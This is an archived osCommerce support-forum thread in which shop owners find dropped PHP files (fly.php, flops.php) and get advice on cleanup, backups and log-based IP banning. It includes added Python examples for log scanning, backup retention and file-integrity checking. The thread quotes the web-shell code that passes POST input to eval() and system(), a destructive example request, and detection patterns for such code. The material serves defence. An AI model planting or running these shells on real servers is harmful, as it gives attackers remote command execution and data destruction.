osCommerce

Fly.php?


Whiskers


Hey all,

 

I just went into FTP to do something and noticed a fly.php file in the root. I just did a search, but am still not entirely sure what this is. This is what is inside it:

 

test<?php @eval($_POST

);?>

 

Thanks for any help.



It is a hack file (albeit a badly coded one). Your hosts should be able to trace where it came from.



That's weird. Is it that eval hack thing? It's weird as someone randomly PM'd me a few weeks ago saying that I should be careful of it (I had never spoken to them before), and suddenly I have it!?

 

What do I need to do to remove/prevent this?

 

Thanks.



The first thing you should do is remove your site from access to the internet. If they can put a file into your root directory they can put one anywhere deep inside your file structure to do whatever they want. You can Google fly.php or use the search here on the forum and likely find specifically what the eval hack is doing, but one of the most common results is sending spam email from your domain. Another is redirecting traffic away from your site. Even though someone clicked on your site they are directed elsewhere, or Google links get changed from your site to somewhere else.

 

If you get it off the internet you can prevent your host from being tagged as a spam email server.

 

Then the easiest way to recover is to wipe your site clean and reload all your files from a known good backup. Then apply all the security measures outlined in the security forum. Only then restore access to your site from the internet. Finding and removing the hack by hand will be cumbersome because the eval hack alters files, not just adds files... you have to find every file that has been altered by the intruder.

 

All I can say is good luck.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?


I have just noticed that I have a flops.php file also? But I don't see it on FTP, only on File Manager in cPanel.

IIRC any file preceded by a . will not show on most ftp programs therefore making that a favorite of hackers to use. Does the filename start with a period? .flops.php



Nope, it doesn't start with a . I have deleted it as it has mention of eval in it. :(


hm just saw that i've the flops.php too, deleted it :/

 

Safe best I guess. I am confident that the people who keep hacking are getting website names from here. As I only ever seem to get hack problems after I have posted up a website name I am working on. I should have learned by now! :(



No, they are probably not. Every day I scan my logs, and every day I see attempts to gain access to common files that no longer exist in my shop because I have taken the necessary steps to secure my site, and I have never published the URL to my site or mentioned the name of the store.

 

I also have random attempts to access phpMyAdmin in any number of variations... phpmyadmin, PhpMyAdmin, PMA, pma, p.m.a, p/m/a, and the list goes on. I have all of those listed as Aliases to a common directory that has an ErrorPage 404 directive to a script that bans the IP address from the entire network. Works like a charm.. They get one attempt and then they are locked out and have to get a new IP to try again... it slows them down but nothing really stops them completely except keeping the server up to date and taking the appropriate software measures before they get to you.

 

 

<rant>

 

Most people make the mistake that deleting a single file they found has cured their site. If you found one, you can be assured there are others, and possibly individual lines of code in existing files have been altered. They fail to take down their own site and really clean it so they continue to send out spam or whatever to aid the hackers in their endeavors....

 

 

</rant>

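The log scanning described in the post above can be automated. The following is an added example (my own code, not from this thread or from osCommerce): it parses Apache combined-format access-log lines, flags the phpMyAdmin path variants the post lists and requests for the two admin scripts this thread later says to delete, groups the hits per client IP, and produces the list of addresses that would be blocked under a "one attempt and you are out" rule. The log lines are constructed samples with documentation-range IPs, and the `/catalog/admin/` layout is an assumption.

```python
import re
from collections import defaultdict

# Apache "combined" log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Spellings of the phpMyAdmin path that the post above says get probed.
PMA_RE = re.compile(r"/(?:phpmyadmin|pma|p\.m\.a|p/m/a)(?:/|$)", re.IGNORECASE)

# Admin scripts the thread recommends removing; once they are gone, any
# request for them is a scanner. The /catalog/admin/ prefix is assumed.
REMOVED_ADMIN_FILES = {
    "/catalog/admin/file_manager.php",
    "/catalog/admin/define_language.php",
}

# Constructed sample log: one shopper and two scanners.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2013:10:01:02 +0000] "GET /catalog/product_info.php?products_id=28 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:10:01:05 +0000] "GET /phpMyAdmin/ HTTP/1.1" 404 210 "-" "-"
198.51.100.7 - - [12/Mar/2013:10:01:05 +0000] "GET /pma/ HTTP/1.1" 404 210 "-" "-"
198.51.100.7 - - [12/Mar/2013:10:01:06 +0000] "GET /p/m/a/index.php HTTP/1.1" 404 210 "-" "-"
192.0.2.44 - - [12/Mar/2013:10:02:11 +0000] "GET /catalog/admin/file_manager.php HTTP/1.1" 404 210 "-" "-"
203.0.113.10 - - [12/Mar/2013:10:03:40 +0000] "GET /catalog/shopping_cart.php HTTP/1.1" 200 6221 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["path"] = entry["path"].split("?", 1)[0]  # drop the query string
    return entry


def classify(entry):
    """Name the kind of probe an entry represents, or None for normal traffic."""
    path = entry["path"]
    if PMA_RE.search(path):
        return "pma_probe"
    if path in REMOVED_ADMIN_FILES:
        return "removed_admin_file"
    return None


def find_probes(lines):
    """Group suspicious requests by client IP: {ip: [(path, reason), ...]}."""
    probes = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            probes[entry["ip"]].append((entry["path"], reason))
    return dict(probes)


def ban_candidates(probes, threshold=1):
    """IPs with at least `threshold` probes; the post locks out after one."""
    return sorted(ip for ip, hits in probes.items() if len(hits) >= threshold)


if __name__ == "__main__":
    found = find_probes(SAMPLE_LOG.splitlines())
    for ip, hits in found.items():
        print(ip, hits)
    print("ban:", ban_candidates(found))
```

The shopper at 203.0.113.10 never appears in the result; the two scanners do, each with the path and the reason it was flagged, so the output can feed whatever blocking mechanism the host provides.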

i know that deleting only one file won't protect me if smtg is already done, but i saw nothing strange about my website :/ no spam sent, no bug (except some that i already have cuz of bad code skill :D) so... i think i'm nearly safe for now :/



Do you use Site Monitor?


The problem with taking a site offline is that I have made weekly backups since the hack files were uploaded, so I would be just uploading the same files again, which is kind of pointless really. :(


No i just discovered it :/ and i'm gonna install it as soon as possible ^^ (i'm new to oscommerce, my shop is running for 1 month only)

Ok, then it will not be much to wipe your site and install a fresh copy. Site monitor will not pick up additional files unless they are added AFTER it is installed and managed properly. The first time it runs it creates a list of files then on your site as a reference file. So, if rogue files are on your site now Site Monitor will not help you find them. It will however, discover certain lines of code in your files that are commonly used by hackers.

 

The point is, the damage has already been done, and you cannot be certain of the extent of the damage with any tool available to you at this point. You are taking a chance that you are keeping a site alive that is damaging to your customers and your host. Even if you reload from new, it does not mean that you have to lose your database. It is likely NOT compromised at this point. It could be, but not likely.



You don't keep multiple backups? I have a library of about 100 zip files containing backups. I can roll back the files and DB if necessary to a year ago and more...



Erm, nope. Every week I delete the old one. :( Maybe I should start keeping them.



A lot of shops with non-critical shops use the 7-1-12 rule for backups. Make a backup set daily. On Sunday, label the backup as a weekly backup and keep it. On the last of the month keep a backup labeled as a monthly backup.

 

So, you keep 6 daily backups, 3 weekly backups, 11 monthly backups, and a yearly backup.

 

You will always have the opportunity to roll back to any day this week. Any week in the past month, any month in the past year, and any prior year.

 

You need storage for 20+ sets of files/db.

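The retention scheme in the post above is easy to get wrong by hand, so here is an added example (my own code, not from this thread) that decides which backup sets to keep. The rules are my reading of the post: any set from the last 7 days is a daily, a Sunday set from the last 3 weeks is a weekly, a last-day-of-month set from the last 365 days is a monthly, and a 31 December set is a yearly and is never pruned. A set that matches several rules is labelled with the longest-lived one, which is why the Sunday inside the daily window counts as a weekly and the totals come out at 6 daily, 3 weekly, 11 monthly and 1 yearly.

```python
import calendar
from datetime import date, timedelta


def is_last_day_of_month(d):
    return d.day == calendar.monthrange(d.year, d.month)[1]


def retention_label(d, today, daily_days=7, weekly_weeks=3, monthly_days=365):
    """Return 'yearly', 'monthly', 'weekly', 'daily', or None (prune).

    Rules are checked from longest-lived to shortest, so a set that qualifies
    for more than one tier gets the longer-lived label.
    """
    age = (today - d).days
    if age < 0:
        return None  # a backup dated in the future is a clock problem, not a tier
    if d.month == 12 and d.day == 31:
        return "yearly"
    if is_last_day_of_month(d) and age < monthly_days:
        return "monthly"
    if d.weekday() == 6 and age <= 7 * weekly_weeks:  # Sunday
        return "weekly"
    if age < daily_days:
        return "daily"
    return None


def select_backups(dates, today):
    """Map each backup date that should be kept to its tier label."""
    keep = {}
    for d in dates:
        label = retention_label(d, today)
        if label:
            keep[d] = label
    return keep


def count_by_label(keep):
    counts = {}
    for label in keep.values():
        counts[label] = counts.get(label, 0) + 1
    return counts


def daily_dates(first, last):
    """Constructed sample: one backup set per day from first to last inclusive."""
    return [first + timedelta(days=i) for i in range((last - first).days + 1)]


if __name__ == "__main__":
    today = date(2013, 3, 12)
    kept = select_backups(daily_dates(date(2012, 1, 1), today), today)
    for d in sorted(kept):
        print(d, kept[d])
    print(count_by_label(kept), "sets to store:", len(kept))
```

Run daily after the new set is written; everything not in the returned map can be deleted, and the storage estimate of "20+ sets" falls straight out of the count.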

btw can someone tell us what's the flops.php really do ?

 

<?php ignore_user_abort(1);set_time_limit(0);if(isset($_POST['aisys'])){@system($_POST['aiflops']);}else{@eval($_POST['aiflops']);}?>

The eval command allows them to send any valid php command string to your server.... like delete c:\*.*

 

So, they send a command like http://www.your_site.com/catalog/flops.php?delete%20*.*;

 

And your site is gone.... little things like that.

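Two earlier points in this thread, that Site Monitor only notices files added after its reference list was taken and that it also looks for lines of code hackers commonly use, and the flops.php listing above, both come down to the same defensive job: baseline the web root while it is known good, then report anything added or altered, and independently flag files that hand request input to eval or system. The following added example (my own code, not Site Monitor and not from this thread) does both over a constructed temporary shop tree; the file names under it are stand-ins, and the only real content in it is the flops.php line quoted above, which is written to disk purely as text to be scanned, never executed. The pattern names are my own labels.

```python
import hashlib
import os
import re
import tempfile

# Code shapes typical of dropped PHP "hack files"; label names are mine.
SUSPICIOUS_PATTERNS = {
    "eval_of_request_input": re.compile(
        r"@?eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "shell_from_request_input": re.compile(
        r"@?(?:system|exec|shell_exec|passthru)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "eval_of_decoded_string": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\("),
}

# Constructed stand-in for a clean shop tree (not a real osCommerce install).
CLEAN_FILES = {
    "index.php": "<?php\nrequire('includes/application_top.php');\necho 'shop';\n",
    "includes/application_top.php": "<?php\n// constructed stand-in\n$x = 1;\n",
    "includes/configure.php": "<?php\ndefine('DB_SERVER', 'localhost');\n",
}

# What an intruder leaves behind: the flops.php from this thread, plus one
# line appended to an existing include (the "altered files" case).
TAMPERED_FILES = {
    "flops.php": "<?php ignore_user_abort(1);set_time_limit(0);if(isset($_POST['aisys']))"
                 "{@system($_POST['aiflops']);}else{@eval($_POST['aiflops']);}?>",
    "includes/application_top.php": "<?php\n// constructed stand-in\n$x = 1;\n"
                                    "@eval(base64_decode('...'));\n",
}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def iter_files(root):
    """Yield (relative '/'-separated path, absolute path) for every file."""
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            yield os.path.relpath(full, root).replace(os.sep, "/"), full


def build_baseline(root):
    """Reference list: relative path -> SHA-256 of content."""
    return {rel: sha256_file(full) for rel, full in iter_files(root)}


def compare(baseline, current):
    """Report files that appeared, disappeared, or changed since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def scan_suspicious(root, extensions=(".php", ".phtml", ".inc")):
    """Content scan: relative path -> list of matched pattern labels."""
    hits = {}
    for rel, full in iter_files(root):
        if not rel.lower().endswith(extensions):
            continue
        with open(full, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        matched = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
        if matched:
            hits[rel] = matched
    return hits


def write_tree(root, files):
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Baseline a clean tree, tamper with it, then run both checks."""
    root = tempfile.mkdtemp(prefix="shop_")
    write_tree(root, CLEAN_FILES)
    baseline = build_baseline(root)      # taken while the site is known good
    write_tree(root, TAMPERED_FILES)     # simulated intrusion
    diff = compare(baseline, build_baseline(root))
    hits = scan_suspicious(root)
    return diff, hits


if __name__ == "__main__":
    diff, hits = demo()
    print("integrity:", diff)
    print("patterns:", hits)
```

The baseline comparison is what catches the altered include, which no file listing would show; the pattern scan is what catches a dropped file even when no baseline exists, which is the situation a shop is in when it first discovers a fly.php. Neither check is proof of a clean site, which is why the advice above to restore from a known good copy still stands.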

4 months later...


Hello to all,

I "resume" this thread because I would like to understand some things. I understand what fly.php can do, but I don't understand how it comes in the root of the website.

file_manager.php is protected by admin password, how is possible to run this program?

All people (and me) that have seen this program on the website are sure that the ftp password isn't known by anybody (it was known & used only by the owner), and many say that no ftp sessions were opened... So, how did it come in?

Can you help me to understand, please?

Really many thanks in advance.

Michele


A programming vulnerability has been identified in files_manager.php and define_language.php that allows hackers to get past the admin login.

 

You should remove the aforementioned files ASAP and it would be a good idea to protect the admin with a .htaccess file, too.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help



Thank you for your reply, really many thanks.

Do you know if there is a vulnerability to get the SQL password too? (assuming that file_manager.php and define_language.php have been removed; the admin directory is password protected too)

The SQL password is stored in catalog\includes\configure.php not only in the catalog\admin\includes\configure.php.

Thanks again

Michele


Archived

This topic is now archived and is closed to further replies.
